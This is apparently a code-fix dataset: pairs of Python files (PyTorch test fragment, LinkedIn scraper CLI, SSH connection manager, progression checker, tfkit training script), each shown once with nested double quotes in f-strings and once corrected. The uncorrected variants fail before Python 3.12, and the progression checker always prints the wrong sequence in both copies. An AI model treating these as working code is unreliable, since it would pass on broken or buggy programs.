(optional) # ) tri_tests_args = [ (1, 1), (3, 3), (3, 3, 1), (3, 3, 2), (3, 3, 200), (3, 3, -1), (3, 3, -2), (3, 3, -200), (0, 3, 0), (0, 3, 1), (0, 3, -1), (0, 1, 2), (1, 0, 2), (3, 0, 0), (3, 0, 1), (3, 0, -1), (0, 0, 0), (0, 0, 1), (0, 0, -1), (3, 6, 0), (3, 6, 1), (3, 6, 3), (3, 6, 9), (3, 6, -1), (3, 6, -3), (3, 6, -9), (6, 3, 0), (6, 3, 1), (6, 3, 3), (6, 3, 9), (6, 3, -1), (6, 3, -3), (6, 3, -9), (258, 253, 1, torch.float32), (257, 258, 1, torch.float64), (258, 258, 1, torch.short), (3, 513, 1, torch.long), (513, 3, 1, torch.int), (513, 0, 1, torch.double), (1024, 1024), (1024, 1024, 500, torch.float32), (1024, 1024, 1023), (1024, 1024, -500), (1023, 1025), (1025, 1023, 1022), (1024, 1024, -500), (3, 2028), (3, 2028, 1), (3, 2028, -1), (2028, 3), (2028, 1), (2028, 1, -1) ] tri_large_tests_args: List[Tuple[int, ...]] = [ # Large test cases below are deliberately commented out to speed up CI # tests and to avoid OOM error. When modifying implementations of # tril_indices and triu_indices, please enable these tests and make sure # they pass. # # (1, 268435455), # (5000, 5000), # (10000, 10000), # (268435455, 1), # (134217727, 2, 1), # (2, 134217727, 1), # (536870901, 1), # (1, 536870901), # (268435455, 2, 1), # (2, 268435455, 1) ] def run_additional_tri_tests(self, device): x = torch.ones( 3, 3, dtype=torch.long, device=device, layout=torch.strided) l = x.tril(0).nonzero().transpose(0, 1) u = x.triu(0).nonzero().transpose(0, 1) self.assertEqual(l, torch.tril_indices(3, 3, device=device)) self.assertEqual( l, torch.tril_indices(3, 3, device=device, layout=torch.strided)) self.assertEqual(u, torch.triu_indices(3, 3, device=device)) self.assertEqual( u, torch.triu_indices(3, 3, device=device, layout=torch.strided)) self.assertRaises( RuntimeError, lambda: torch.triu_indices( 1, 1, device=device, layout=torch.sparse_coo)) self.assertRaises( RuntimeError, lambda: torch.tril_indices( 1, 1, device=device, layout=torch.sparse_coo))
#!/usr/bin/env python3 from argparse import ArgumentParser from os import path import sys import time try: sys.path.insert(0, path.abspath(path.join(path.dirname(__file__), ".."))) from scraper import __version__ from scraper import main except ModuleNotFoundError as e: print(f"[x] {e}") sys.exit(1) if __name__ == "__main__": parser = ArgumentParser(description="Business scraper on Linkedin") parser.add_argument("-u", "--url", type=str, help="set URL", required="True") parser.add_argument( "-d", "--driver", type=str, help="Set path to chromedriver", required="True" ) parser.add_argument( "-o", "--output", type=str, help="Set output file name", default=f"{time.strftime("%d%m%y-%H%M%S")}.csv", ) parser.add_argument( "-v", "--version", action="version", version="%(prog)s " + __version__ ) args = parser.parse_args() main.Init(args)
#!/usr/bin/env python3 from argparse import ArgumentParser from os import path import sys import time try: sys.path.insert(0, path.abspath(path.join(path.dirname(__file__), ".."))) from scraper import __version__ from scraper import main except ModuleNotFoundError as e: print(f"[x] {e}") sys.exit(1) if __name__ == "__main__": parser = ArgumentParser(description="Business scraper on Linkedin") parser.add_argument("-u", "--url", type=str, help="set URL", required="True") parser.add_argument( "-d", "--driver", type=str, help="Set path to chromedriver", required="True" ) parser.add_argument( "-o", "--output", type=str, help="Set output file name", default=f"{time.strftime('%d%m%y-%H%M%S')}.csv", ) parser.add_argument( "-v", "--version", action="version", version="%(prog)s " + __version__ ) args = parser.parse_args() main.Init(args)
import json from ssh_keyword_tools import checkQuit from ssh_keyword_json import ManageJson from ssh_keyword_newconnection import CreateConnection class Connection(object): 'Manage connections' def __init__(self, ip='0'): self.ip = ip self.fJson = ManageJson() def setConnection(self): if not self.isExist(self.ip): newConnection = CreateConnection() print('Entry for new connection') print("Enter 'Quit' for exit") print() self.user = newConnection.qUser() self.port = newConnection.qPort() self.keywords = newConnection.qKeywords() self.default = newConnection.qDefault() datajson = self.toJson() self.reloadDatas() self.fJson.data.append(json.loads(datajson)) self.toFile() else: print('Connection already exist, you can edit it') def getConnection(self, value, dictKey): 'Get connection from json' if self.fJson.search(value, dictKey): return self.fJson.search(value, dictKey) return None def isExist(self, ip): if self.fJson.search(ip, 'ip'): return True return False def remove(self): 'Remove a connection from json' if self.isExist(self.ip): connection = self.getConnection(self.ip, 'ip') self.fJson.data.remove(connection) self.toFile() else: print("connection not found") def update(self, connection, value, dictKey): 'Update a connection from json' indexConnection = self.fJson.data.index(connection) self.fJson.data[indexConnection].update({value:dictKey}) self.toFile() def edit(self): 'Edit a connection from json' if self.isExist(self.ip): connection = self.getConnection(self.ip, 'ip') while True: ip, user = connection.get('ip'), connection.get('user') port, keyword = connection.get('port'), connection.get('keywords') default = connection.get('default') print(f'Edit connection {self.ip}') print(f"ip:{ip} user:{user} port:{port} keywords:{keyword} default:{default}") print('') enter = input("What do you want to edit ([Q]uit for exit): ") checkQuit(enter) if enter.lower() in ['ip', 'user', 'port', 'keywords', 'default']: editCo = CreateConnection() if enter.lower() == 'ip': ip = editCo.qIp() if not self.isExist(ip): self.update(connection, 'ip', ip) self.ip = ip print('Ip edited') else: print('Ip already exist') elif enter.lower() == 'user': self.update(connection, 'user', editCo.qUser()) print('User edited') elif enter == 'port': self.update(connection, 'port', editCo.qPort()) print('Port edited') elif enter.lower() == 'keywords': self.update(connection, 'keywords', editCo.qKeywords()) print('Keywords edited') elif enter.lower() == 'default': self.update(connection, 'default', editCo.qDefault()) print('Server default edited') connection = self.getConnection(self.ip, 'ip') print('') else: print("Connection not found") def addDefault(self): 'Add a default connection' if self.isExist(self.ip): connection = self.getConnection(self.ip, 'ip') if self.getConnection(True, 'default'): previousConnection = self.getConnection(True, 'default') print(f"Previous connection '{previousConnection.get("ip")}' default is now set to False") self.update(previousConnection, 'default', False) self.update(connection, 'default', True) self.toFile() else: print("Connection not found") def toJson(self): del self.fJson return json.dumps(self, default=lambda o: o.__dict__, sort_keys=True, indent=4) def toFile(self): self.fJson.saveToJson() self.reloadDatas() def reloadDatas(self): 'Reload json file' self.fJson = ManageJson()
import json from ssh_keyword_tools import checkQuit from ssh_keyword_json import ManageJson from ssh_keyword_newconnection import CreateConnection class Connection(object): 'Manage connections' def __init__(self, ip='0'): self.ip = ip self.fJson = ManageJson() def setConnection(self): if not self.isExist(self.ip): newConnection = CreateConnection() print('Entry for new connection') print("Enter 'Quit' for exit") print() self.user = newConnection.qUser() self.port = newConnection.qPort() self.keywords = newConnection.qKeywords() self.default = newConnection.qDefault() datajson = self.toJson() self.reloadDatas() self.fJson.data.append(json.loads(datajson)) self.toFile() else: print('Connection already exist, you can edit it') def getConnection(self, value, dictKey): 'Get connection from json' if self.fJson.search(value, dictKey): return self.fJson.search(value, dictKey) return None def isExist(self, ip): if self.fJson.search(ip, 'ip'): return True return False def remove(self): 'Remove a connection from json' if self.isExist(self.ip): connection = self.getConnection(self.ip, 'ip') self.fJson.data.remove(connection) self.toFile() else: print("connection not found") def update(self, connection, value, dictKey): 'Update a connection from json' indexConnection = self.fJson.data.index(connection) self.fJson.data[indexConnection].update({value:dictKey}) self.toFile() def edit(self): 'Edit a connection from json' if self.isExist(self.ip): connection = self.getConnection(self.ip, 'ip') while True: ip, user = connection.get('ip'), connection.get('user') port, keyword = connection.get('port'), connection.get('keywords') default = connection.get('default') print(f'Edit connection {self.ip}') print(f"ip:{ip} user:{user} port:{port} keywords:{keyword} default:{default}") print('') enter = input("What do you want to edit ([Q]uit for exit): ") checkQuit(enter) if enter.lower() in ['ip', 'user', 'port', 'keywords', 'default']: editCo = CreateConnection() if enter.lower() == 'ip': ip = editCo.qIp() if not self.isExist(ip): self.update(connection, 'ip', ip) self.ip = ip print('Ip edited') else: print('Ip already exist') elif enter.lower() == 'user': self.update(connection, 'user', editCo.qUser()) print('User edited') elif enter == 'port': self.update(connection, 'port', editCo.qPort()) print('Port edited') elif enter.lower() == 'keywords': self.update(connection, 'keywords', editCo.qKeywords()) print('Keywords edited') elif enter.lower() == 'default': self.update(connection, 'default', editCo.qDefault()) print('Server default edited') connection = self.getConnection(self.ip, 'ip') print('') else: print("Connection not found") def addDefault(self): 'Add a default connection' if self.isExist(self.ip): connection = self.getConnection(self.ip, 'ip') if self.getConnection(True, 'default'): previousConnection = self.getConnection(True, 'default') print(f"Previous connection '{previousConnection.get('ip')}' default is now set to False") self.update(previousConnection, 'default', False) self.update(connection, 'default', True) self.toFile() else: print("Connection not found") def toJson(self): del self.fJson return json.dumps(self, default=lambda o: o.__dict__, sort_keys=True, indent=4) def toFile(self): self.fJson.saveToJson() self.reloadDatas() def reloadDatas(self): 'Reload json file' self.fJson = ManageJson()
#!/usr/bin/env python3 ########################################################################### # # # Program purpose: Determines if a list of integer is an Arithmetic # # or Geometric progression. # # Program Author : Happi Yvan <ivensteinpoker@gmail.com> # # Creation Date : September 9, 2019 # # # ########################################################################### def ap_gp_sequence(data=None): if data is None: data = [] if data[0] == data[1] == data[2] == 0: return {"error": "Wrong numbers"} else: if data[1] - data[0] == data[2] - data[1]: temp = 2 * data[2] - data[1] return {"seq": "AP", "next": str(temp)} else: temp = data[2] ** 2 / data[1] return {"seq": "GP", "next": str(temp)} def print_info(info=None): if "error" in info.keys(): print(f"{seq_a} is not AP or GP") else: print(f"{seq_a} is {info["seq"]} and next value is {info["next"]}") if __name__ == "__main__": seq_a = [1, 2, 3] seq_b = [2, 6, 18] seq_c = [0, 0, 0] print_info(ap_gp_sequence(data=seq_a)) print_info(ap_gp_sequence(data=seq_b)) print_info(ap_gp_sequence(data=seq_c))
#!/usr/bin/env python3 ########################################################################### # # # Program purpose: Determines if a list of integer is an Arithmetic # # or Geometric progression. # # Program Author : Happi Yvan <ivensteinpoker@gmail.com> # # Creation Date : September 9, 2019 # # # ########################################################################### def ap_gp_sequence(data=None): if data is None: data = [] if data[0] == data[1] == data[2] == 0: return {"error": "Wrong numbers"} else: if data[1] - data[0] == data[2] - data[1]: temp = 2 * data[2] - data[1] return {"seq": "AP", "next": str(temp)} else: temp = data[2] ** 2 / data[1] return {"seq": "GP", "next": str(temp)} def print_info(info=None): if "error" in info.keys(): print(f"{seq_a} is not AP or GP") else: print(f"{seq_a} is {info['seq']} and next value is {info['next']}") if __name__ == "__main__": seq_a = [1, 2, 3] seq_b = [2, 6, 18] seq_c = [0, 0, 0] print_info(ap_gp_sequence(data=seq_a)) print_info(ap_gp_sequence(data=seq_b)) print_info(ap_gp_sequence(data=seq_c))
import argparse import sys import os from datetime import timedelta import time from itertools import zip_longest import torch from torch.utils import data from tqdm.auto import tqdm from transformers import get_linear_schedule_with_warmup import nlp2 import tfkit import tfkit.utility.tok as tok from tfkit.utility.dataset import get_dataset, dataloader_collate from tfkit.utility.logger import Logger from tfkit.utility.model import load_model_class, save_model, load_pretrained_tokenizer, load_pretrained_model import logging from accelerate import Accelerator transformers_logger = logging.getLogger('transformers') transformers_logger.setLevel(logging.CRITICAL) os.environ["TOKENIZERS_PARALLELISM"] = "false" os.environ["OMP_NUM_THREADS"] = "1" def parse_train_args(args): parser = argparse.ArgumentParser() exceed_mode = nlp2.function_get_all_arg_with_value(tok.handle_exceed)['mode'] parser.add_argument("--batch", type=int, default=20, help="batch size, default 20") parser.add_argument("--lr", type=float, nargs='+', default=[5e-5], help="learning rate, default 5e-5") parser.add_argument("--epoch", type=int, default=10, help="epoch, default 10") parser.add_argument("--maxlen", type=int, default=0, help="max tokenized sequence length, default model max len") parser.add_argument("--handle_exceed", choices=exceed_mode, help='select ways to handle input exceed max length') parser.add_argument("--savedir", type=str, default="checkpoints/", help="model saving dir, default /checkpoints") parser.add_argument("--add_tokens_freq", type=int, default=0, help="auto add freq >= x UNK token to word table") parser.add_argument("--add_tokens_file", type=str, help="add token from a list file") parser.add_argument("--train", type=str, nargs='+', required=True, help="train dataset path") parser.add_argument("--test", type=str, nargs='+', required=True, help="test dataset path") parser.add_argument("--no_eval", action='store_true', help="not running evaluation") parser.add_argument("--model", type=str, required=True, nargs='+', choices=tfkit.utility.model.list_all_model(), help="model task") parser.add_argument("--tag", type=str, nargs='+', help="tag to identity task in multi-task") parser.add_argument("--config", type=str, default='bert-base-multilingual-cased', required=True, help='distilbert-base-multilingual-cased|voidful/albert_chinese_small') parser.add_argument("--seed", type=int, default=609, help="random seed, default 609") parser.add_argument("--worker", type=int, default=8, help="number of worker on pre-processing, default 8") parser.add_argument("--grad_accum", type=int, default=1, help="gradient accumulation, default 1") parser.add_argument('--tensorboard', action='store_true', help='Turn on tensorboard graphing') parser.add_argument('--wandb', action='store_true', help='Turn on wandb with project name') parser.add_argument("--resume", help='resume training') parser.add_argument("--cache", action='store_true', help='cache training data') parser.add_argument("--panel", action='store_true', help="enable panel to input argument") input_arg, model_arg = parser.parse_known_args(args) input_arg = {k: v for k, v in vars(input_arg).items() if v is not None} model_arg = {k.replace("--", ""): v for k, v in zip(model_arg[:-1:2], model_arg[1::2])} return input_arg, model_arg def optimizer(model, lr, total_step): optim = torch.optim.AdamW(model.parameters(), lr=lr) scheduler = get_linear_schedule_with_warmup(optim, num_warmup_steps=int(total_step * 0.05), num_training_steps=total_step) return [optim, scheduler] def model_train(models_list, dataloaders, models_tag, input_arg, epoch, logger, accelerator): optims_schs = [] models = [] total_iter = 0 t_loss = 0 end = False total_iter_length = len(dataloaders[0]) pbar = tqdm(total=total_iter_length) data_iters = [] for i, (model, dataloader) in enumerate(zip(models_list, dataloaders)): if not accelerator.state.backend: model = torch.nn.DataParallel(model) model.train() optim = optimizer(model, input_arg.get('lr')[i] if i < len(input_arg.get('lr')) else input_arg.get('lr')[0], total_iter_length) model, optim, dataloader = accelerator.prepare(model, optim, dataloader) optims_schs.append(optim) models.append(model) data_iters.append(iter(dataloader)) while not end: for (model, optim_sch, mtag, train_batch) in zip(models, optims_schs, models_tag, data_iters): optim = optim_sch[0] scheduler = optim_sch[1] train_batch = next(train_batch, None) if train_batch is not None: loss = model(train_batch) loss = loss / input_arg.get('grad_accum') accelerator.backward(loss.mean()) if (total_iter + 1) % input_arg.get('grad_accum') == 0: optim.step() model.zero_grad() scheduler.step() t_loss += loss.mean().detach() logger.write_metric("loss/step", loss.mean().detach(), epoch) if total_iter % 100 == 0 and total_iter != 0: # monitoring logger.write_log( f"epoch: {epoch}, tag: {mtag}, model: {model.__class__.__name__}, step: {total_iter}, loss: {t_loss / total_iter if total_iter > 0 else 0}, total:{total_iter_length}") else: end = True pbar.update(1) total_iter += 1 pbar.close() logger.write_log( f"epoch: {epoch}, step: {total_iter}, loss: {t_loss / total_iter if total_iter > 0 else 0}, total: {total_iter}") return t_loss / total_iter def model_eval(models, dataloaders, fname, input_arg, epoch, logger, accelerator): t_loss = 0 t_length = 0 for m in models: m.eval() with torch.no_grad(): total_iter_length = len(dataloaders[0]) iters = [iter(accelerator.prepare(ds)) for ds in dataloaders] end = False pbar = tqdm(total=total_iter_length) while not end: for model, batch in zip(models, iters): test_batch = next(batch, None) if test_batch is not None: loss = model(test_batch) loss = loss / input_arg.get('grad_accum') t_loss += loss.mean().detach() t_length += 1 pbar.update(1) else: end = True pbar.close() avg_t_loss = t_loss / t_length if t_length > 0 else 0 logger.write_log(f"model: {fname}, Total Loss: {avg_t_loss}") logger.write_metric("eval_loss/step", avg_t_loss, epoch) return avg_t_loss def load_model_and_datas(tokenizer, pretrained, accelerator, model_arg, input_arg): models = [] train_dataset = [] test_dataset = [] train_ds_maxlen = 0 test_ds_maxlen = 0 for model_class_name, train_file, test_file in zip_longest(input_arg.get('model'), input_arg.get('train'), input_arg.get('test'), fillvalue=""): # get model class model_class = load_model_class(model_class_name) # load dataset ds_parameter = {**model_arg, **input_arg} train_ds = get_dataset(train_file, model_class, tokenizer, ds_parameter) test_ds = get_dataset(test_file, model_class, tokenizer, ds_parameter) # load model model = model_class.Model(tokenizer=tokenizer, pretrained=pretrained, tasks_detail=train_ds.task, maxlen=input_arg.get('maxlen'), **model_arg) # append to max len train_ds_maxlen = train_ds.__len__() if train_ds.__len__() > train_ds_maxlen else train_ds_maxlen test_ds_maxlen = test_ds.__len__() if test_ds.__len__() > test_ds_maxlen else test_ds_maxlen train_dataset.append(train_ds) test_dataset.append(test_ds) models.append(model) return models, train_dataset, test_dataset, train_ds_maxlen, test_ds_maxlen def main(arg=None): input_arg, model_arg = parse_train_args(sys.argv[1:]) if arg is None else parse_train_args(arg) accelerator = Accelerator() nlp2.get_dir_with_notexist_create(input_arg.get('savedir')) logger = Logger(savedir=input_arg.get('savedir'), tensorboard=input_arg.get('tensorboard', False), wandb=input_arg.get('wandb', False), print_fn=accelerator.print) logger.write_log("Accelerator") logger.write_log("=======================") logger.write_log(accelerator.state) logger.write_log("=======================") nlp2.set_seed(input_arg.get('seed')) tokenizer = load_pretrained_tokenizer(input_arg.get('config')) pretrained = load_pretrained_model(input_arg.get('config'), input_arg.get('model')) if input_arg.get('maxlen') == 0: input_arg.update({'maxlen': pretrained.config.max_position_embeddings}) # handling add tokens add_tokens = None if input_arg.get('add_tokens_freq', None): logger.write_log("Calculating Unknown Token") add_tokens = tok.get_freqK_unk_token(tokenizer, input_arg.get('train') + input_arg.get('test'), input_arg.get('add_tokens_freq')) if input_arg.get('add_tokens_file', None): logger.write_log("Add token from file") add_tokens = nlp2.read_files_into_lines(input_arg.get('add_tokens_file')) if add_tokens: pretrained, tokenizer = tfkit.utility.model.add_tokens_to_pretrain(pretrained, tokenizer, add_tokens) # load model and data models_tag = input_arg.get('tag') if input_arg.get('tag', None) is not None else [m.lower() + "_" + str(ind) for ind, m in enumerate(input_arg.get('model'))] models, train_dataset, test_dataset, train_ds_maxlen, test_ds_maxlen = load_model_and_datas(tokenizer, pretrained, accelerator, model_arg, input_arg) # balance sample for multi-task for ds in train_dataset: ds.increase_with_sampling(train_ds_maxlen) for ds in test_dataset: ds.increase_with_sampling(test_ds_maxlen) logger.write_config(input_arg) logger.write_log("TRAIN PARAMETER") logger.write_log("=======================") [logger.write_log(str(key) + " : " + str(value)) for key, value in input_arg.items()] logger.write_log("=======================") train_dataloaders = [data.DataLoader(dataset=ds, batch_size=input_arg.get('batch'), shuffle=True, pin_memory=False, collate_fn=dataloader_collate, num_workers=input_arg.get('worker')) for ds in train_dataset] test_dataloaders = [data.DataLoader(dataset=ds, batch_size=input_arg.get('batch'), shuffle=False, pin_memory=False, collate_fn=dataloader_collate, num_workers=input_arg.get('worker')) for ds in test_dataset] # loading model back start_epoch = 1 if input_arg.get('resume'): logger.write_log("Loading back:", input_arg.get('resume')) package = torch.load(input_arg.get('resume')) if 'model_state_dict' in package: models[0].load_state_dict(package['model_state_dict']) else: if len(models) != len(package['models']) and not input_arg.get('tag'): raise Exception( f"resuming from multi-task model, you should specific which task to use with --tag, from {package["tags"]}") elif len(models) != len(package['models']): tags = input_arg.get('tag') else: tags = package['tags'] for ind, model_tag in enumerate(tags): tag_ind = package['tags'].index(model_tag) models[ind].load_state_dict(package['models'][tag_ind]) start_epoch = int(package.get('epoch', 1)) + 1 # train/eval loop logger.write_log("training batch : " + str(input_arg.get('batch') * input_arg.get('grad_accum'))) for epoch in range(start_epoch, start_epoch + input_arg.get('epoch')): start_time = time.time() fname = os.path.join(input_arg.get('savedir'), str(epoch)) logger.write_log(f"=========train at epoch={epoch}=========") try: train_avg_loss = model_train(models, train_dataloaders, models_tag, input_arg, epoch, logger, accelerator) logger.write_metric("train_loss/epoch", train_avg_loss, epoch) except KeyboardInterrupt: save_model(models, input_arg, models_tag, epoch, fname + "_interrupt", logger, add_tokens=add_tokens, accelerator=accelerator) pass logger.write_log(f"=========save at epoch={epoch}=========") save_model(models, input_arg, models_tag, epoch, fname, logger, add_tokens=add_tokens, accelerator=accelerator) if input_arg.get('no_eval') is False: logger.write_log(f"=========eval at epoch={epoch}=========") eval_avg_loss = model_eval(models, test_dataloaders, fname, input_arg, epoch, logger, accelerator) logger.write_metric("eval_loss/epoch", eval_avg_loss, epoch) logger.write_log(f"=== Epoch execution time: {timedelta(seconds=(time.time() - start_time))} ===") if __name__ == "__main__": main()
import argparse import sys import os from datetime import timedelta import time from itertools import zip_longest import torch from torch.utils import data from tqdm.auto import tqdm from transformers import get_linear_schedule_with_warmup import nlp2 import tfkit import tfkit.utility.tok as tok from tfkit.utility.dataset import get_dataset, dataloader_collate from tfkit.utility.logger import Logger from tfkit.utility.model import load_model_class, save_model, load_pretrained_tokenizer, load_pretrained_model import logging from accelerate import Accelerator transformers_logger = logging.getLogger('transformers') transformers_logger.setLevel(logging.CRITICAL) os.environ["TOKENIZERS_PARALLELISM"] = "false" os.environ["OMP_NUM_THREADS"] = "1" def parse_train_args(args): parser = argparse.ArgumentParser() exceed_mode = nlp2.function_get_all_arg_with_value(tok.handle_exceed)['mode'] parser.add_argument("--batch", type=int, default=20, help="batch size, default 20") parser.add_argument("--lr", type=float, nargs='+', default=[5e-5], help="learning rate, default 5e-5") parser.add_argument("--epoch", type=int, default=10, help="epoch, default 10") parser.add_argument("--maxlen", type=int, default=0, help="max tokenized sequence length, default model max len") parser.add_argument("--handle_exceed", choices=exceed_mode, help='select ways to handle input exceed max length') parser.add_argument("--savedir", type=str, default="checkpoints/", help="model saving dir, default /checkpoints") parser.add_argument("--add_tokens_freq", type=int, default=0, help="auto add freq >= x UNK token to word table") parser.add_argument("--add_tokens_file", type=str, help="add token from a list file") parser.add_argument("--train", type=str, nargs='+', required=True, help="train dataset path") parser.add_argument("--test", type=str, nargs='+', required=True, help="test dataset path") parser.add_argument("--no_eval", action='store_true', help="not running evaluation") parser.add_argument("--model", type=str, required=True, nargs='+', choices=tfkit.utility.model.list_all_model(), help="model task") parser.add_argument("--tag", type=str, nargs='+', help="tag to identity task in multi-task") parser.add_argument("--config", type=str, default='bert-base-multilingual-cased', required=True, help='distilbert-base-multilingual-cased|voidful/albert_chinese_small') parser.add_argument("--seed", type=int, default=609, help="random seed, default 609") parser.add_argument("--worker", type=int, default=8, help="number of worker on pre-processing, default 8") parser.add_argument("--grad_accum", type=int, default=1, help="gradient accumulation, default 1") parser.add_argument('--tensorboard', action='store_true', help='Turn on tensorboard graphing') parser.add_argument('--wandb', action='store_true', help='Turn on wandb with project name') parser.add_argument("--resume", help='resume training') parser.add_argument("--cache", action='store_true', help='cache training data') parser.add_argument("--panel", action='store_true', help="enable panel to input argument") input_arg, model_arg = parser.parse_known_args(args) input_arg = {k: v for k, v in vars(input_arg).items() if v is not None} model_arg = {k.replace("--", ""): v for k, v in zip(model_arg[:-1:2], model_arg[1::2])} return input_arg, model_arg def optimizer(model, lr, total_step): optim = torch.optim.AdamW(model.parameters(), lr=lr) scheduler = get_linear_schedule_with_warmup(optim, num_warmup_steps=int(total_step * 0.05), num_training_steps=total_step) return [optim, scheduler] def model_train(models_list, dataloaders, models_tag, input_arg, epoch, logger, accelerator): optims_schs = [] models = [] total_iter = 0 t_loss = 0 end = False total_iter_length = len(dataloaders[0]) pbar = tqdm(total=total_iter_length) data_iters = [] for i, (model, dataloader) in enumerate(zip(models_list, dataloaders)): if not accelerator.state.backend: model = torch.nn.DataParallel(model) model.train() optim = optimizer(model, input_arg.get('lr')[i] if i < len(input_arg.get('lr')) else input_arg.get('lr')[0], total_iter_length) model, optim, dataloader = accelerator.prepare(model, optim, dataloader) optims_schs.append(optim) models.append(model) data_iters.append(iter(dataloader)) while not end: for (model, optim_sch, mtag, train_batch) in zip(models, optims_schs, models_tag, data_iters): optim = optim_sch[0] scheduler = optim_sch[1] train_batch = next(train_batch, None) if train_batch is not None: loss = model(train_batch) loss = loss / input_arg.get('grad_accum') accelerator.backward(loss.mean()) if (total_iter + 1) % input_arg.get('grad_accum') == 0: optim.step() model.zero_grad() scheduler.step() t_loss += loss.mean().detach() logger.write_metric("loss/step", loss.mean().detach(), epoch) if total_iter % 100 == 0 and total_iter != 0: # monitoring logger.write_log( f"epoch: {epoch}, tag: {mtag}, model: {model.__class__.__name__}, step: {total_iter}, loss: {t_loss / total_iter if total_iter > 0 else 0}, total:{total_iter_length}") else: end = True pbar.update(1) total_iter += 1 pbar.close() logger.write_log( f"epoch: {epoch}, step: {total_iter}, loss: {t_loss / total_iter if total_iter > 0 else 0}, total: {total_iter}") return t_loss / total_iter def model_eval(models, dataloaders, fname, input_arg, epoch, logger, accelerator): t_loss = 0 t_length = 0 for m in models: m.eval() with torch.no_grad(): total_iter_length = len(dataloaders[0]) iters = [iter(accelerator.prepare(ds)) for ds in dataloaders] end = False pbar = tqdm(total=total_iter_length) while not end: for model, batch in zip(models, iters): test_batch = next(batch, None) if test_batch is not None: loss = model(test_batch) loss = loss / input_arg.get('grad_accum') t_loss += loss.mean().detach() t_length += 1 pbar.update(1) else: end = True pbar.close() avg_t_loss = t_loss / t_length if t_length > 0 else 0 logger.write_log(f"model: {fname}, Total Loss: {avg_t_loss}") logger.write_metric("eval_loss/step", avg_t_loss, epoch) return avg_t_loss def load_model_and_datas(tokenizer, pretrained, accelerator, model_arg, input_arg): models = [] train_dataset = [] test_dataset = [] train_ds_maxlen = 0 test_ds_maxlen = 0 for model_class_name, train_file, test_file in zip_longest(input_arg.get('model'), input_arg.get('train'), input_arg.get('test'), fillvalue=""): # get model class model_class = load_model_class(model_class_name) # load dataset ds_parameter = {**model_arg, **input_arg} train_ds = get_dataset(train_file, model_class, tokenizer, ds_parameter) test_ds = get_dataset(test_file, model_class, tokenizer, ds_parameter) # load model model = model_class.Model(tokenizer=tokenizer, pretrained=pretrained, tasks_detail=train_ds.task, maxlen=input_arg.get('maxlen'), **model_arg) # append to max len train_ds_maxlen = train_ds.__len__() if train_ds.__len__() > train_ds_maxlen else train_ds_maxlen test_ds_maxlen = test_ds.__len__() if test_ds.__len__() > test_ds_maxlen else test_ds_maxlen train_dataset.append(train_ds) test_dataset.append(test_ds) models.append(model) return models, train_dataset, test_dataset, train_ds_maxlen, test_ds_maxlen def main(arg=None): input_arg, model_arg = parse_train_args(sys.argv[1:]) if arg is None else parse_train_args(arg) accelerator = Accelerator() nlp2.get_dir_with_notexist_create(input_arg.get('savedir')) logger = Logger(savedir=input_arg.get('savedir'), tensorboard=input_arg.get('tensorboard', False), wandb=input_arg.get('wandb', False), print_fn=accelerator.print) logger.write_log("Accelerator") logger.write_log("=======================") logger.write_log(accelerator.state) logger.write_log("=======================") nlp2.set_seed(input_arg.get('seed')) tokenizer = load_pretrained_tokenizer(input_arg.get('config')) pretrained = load_pretrained_model(input_arg.get('config'), input_arg.get('model')) if input_arg.get('maxlen') == 0: input_arg.update({'maxlen': pretrained.config.max_position_embeddings}) # handling add tokens add_tokens = None if input_arg.get('add_tokens_freq', None): logger.write_log("Calculating Unknown Token") add_tokens = tok.get_freqK_unk_token(tokenizer, input_arg.get('train') + input_arg.get('test'), input_arg.get('add_tokens_freq')) if input_arg.get('add_tokens_file', None): logger.write_log("Add token from file") add_tokens = nlp2.read_files_into_lines(input_arg.get('add_tokens_file')) if add_tokens: pretrained, tokenizer = tfkit.utility.model.add_tokens_to_pretrain(pretrained, tokenizer, add_tokens) # load model and data models_tag = input_arg.get('tag') if input_arg.get('tag', None) is not None else [m.lower() + "_" + str(ind) for ind, m in enumerate(input_arg.get('model'))] models, train_dataset, test_dataset, train_ds_maxlen, test_ds_maxlen = load_model_and_datas(tokenizer, pretrained, accelerator, model_arg, input_arg) # balance sample for multi-task for ds in train_dataset: ds.increase_with_sampling(train_ds_maxlen) for ds in test_dataset: ds.increase_with_sampling(test_ds_maxlen) logger.write_config(input_arg) logger.write_log("TRAIN PARAMETER") logger.write_log("=======================") [logger.write_log(str(key) + " : " + str(value)) for key, value in input_arg.items()] logger.write_log("=======================") train_dataloaders = [data.DataLoader(dataset=ds, batch_size=input_arg.get('batch'), shuffle=True, pin_memory=False, collate_fn=dataloader_collate, num_workers=input_arg.get('worker')) for ds in train_dataset] test_dataloaders = [data.DataLoader(dataset=ds, batch_size=input_arg.get('batch'), shuffle=False, pin_memory=False, collate_fn=dataloader_collate, num_workers=input_arg.get('worker')) for ds in test_dataset] # loading model back start_epoch = 1 if input_arg.get('resume'): logger.write_log("Loading back:", input_arg.get('resume')) package = torch.load(input_arg.get('resume')) if 'model_state_dict' in package: models[0].load_state_dict(package['model_state_dict']) else: if len(models) != len(package['models']) and not input_arg.get('tag'): raise Exception( f"resuming from multi-task model, you should specific which task to use with --tag, from {package['tags']}") elif len(models) != len(package['models']): tags = input_arg.get('tag') else: tags = package['tags'] for ind, model_tag in enumerate(tags): tag_ind = package['tags'].index(model_tag) models[ind].load_state_dict(package['models'][tag_ind]) start_epoch = int(package.get('epoch', 1)) + 1 # train/eval loop logger.write_log("training batch : " + str(input_arg.get('batch') * input_arg.get('grad_accum'))) for epoch in range(start_epoch, start_epoch + input_arg.get('epoch')): start_time = time.time() fname = os.path.join(input_arg.get('savedir'), str(epoch)) logger.write_log(f"=========train at epoch={epoch}=========") try: train_avg_loss = model_train(models, train_dataloaders, models_tag, input_arg, epoch, logger, accelerator) logger.write_metric("train_loss/epoch", train_avg_loss, epoch) except KeyboardInterrupt: save_model(models, input_arg, models_tag, epoch, fname + "_interrupt", logger, add_tokens=add_tokens, accelerator=accelerator) pass logger.write_log(f"=========save at epoch={epoch}=========") save_model(models, input_arg, models_tag, epoch, fname, logger, add_tokens=add_tokens, accelerator=accelerator) if input_arg.get('no_eval') is False: logger.write_log(f"=========eval at epoch={epoch}=========") eval_avg_loss = model_eval(models, test_dataloaders, fname, input_arg, epoch, logger, accelerator) logger.write_metric("eval_loss/epoch", eval_avg_loss, epoch) logger.write_log(f"=== Epoch execution time: {timedelta(seconds=(time.time() - start_time))} ===") if __name__ == "__main__": main()
